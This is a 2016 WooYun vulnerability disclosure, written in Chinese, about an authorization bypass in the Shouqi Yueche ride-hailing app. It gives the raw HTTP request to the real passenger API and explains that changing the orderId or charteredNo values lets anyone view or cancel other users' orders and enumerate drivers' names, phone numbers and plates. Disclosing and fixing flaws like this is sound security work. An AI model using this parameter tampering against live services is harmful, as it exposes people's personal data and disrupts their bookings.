当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0169507

漏洞标题:首汽约车APP越权查询和取消任意订单及获取所有约车司机信息

相关厂商:首汽约车

漏洞作者: 采花大盗

提交时间:2016-01-13 09:19

修复时间:2016-02-22 16:48

公开时间:2016-02-22 16:48

漏洞类型:未授权访问/权限绕过

危害等级:高

自评Rank:16

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2016-01-13: 细节已通知厂商并且等待厂商处理中
2016-01-13: 厂商已经确认,细节仅向厂商公开
2016-01-23: 细节向核心白帽子及相关领域专家公开
2016-02-02: 细节向普通白帽子公开
2016-02-12: 细节向实习白帽子公开
2016-02-22: 细节向公众公开

简要描述:

约车APP越权查询任意订单信息及取消任意订单以及获取所有约车司机信息,可遍历!!!

详细说明:

1、模拟正常用户下单
操作步骤:打开首汽约车APP--预约用车--下一个订单
2、查看订单预定信息
操作步骤:我的行程--个人行程--刚才下的订单--右上角预订信息 抓取数据包,数据包如下

POST /car-rest/webservice/passenger/myTrip/getTripBooking_V3_0 HTTP/1.1
Host: passenger.01zhuanche.com
car-ps: AppStore
Accept: */*
car-pf: IOS
car-sv: 8.4.1
Accept-Language: zh-Hans;q=1, en;q=0.9
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
car-mv: iPhone 5S
Content-Length: 60
User-Agent: GuoBinTeam/18 (iPhone; iOS 8.4.1; Scale/2.00)
Connection: keep-alive
car-vs: 3.0
car-mi: 06181f297be
orderId=2000000&token=yourToken


修改orderId的值 即可获取他人订单信息。

QQ20160112-7.jpg


QQ20160112-4.jpg


3、取消他人订单
订单中有个charteredNo参数,将订单信息中的charteredNo值替换即可取消

QQ20160112-6.jpg


4、查询所有司机的信息,可遍历!!!(包括车牌、车型、姓名、手机号、驾龄等)

QQ20160112-0.jpg


QQ20160112-1.jpg


漏洞证明:

1、获取他人订单信息

QQ20160112-4.jpg


QQ20160112-5.jpg


QQ20160112-7.jpg


2、取消他人订单

QQ20160112-6.jpg


3、获取所有司机信息

QQ20160112-0.jpg


QQ20160112-1.jpg


修复方案:

对请求做身份校验

版权声明:转载请注明来源 采花大盗@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:18

确认时间:2016-01-13 10:40

厂商回复:

感谢您的反馈,我们正在进行处理。

最新状态:

暂无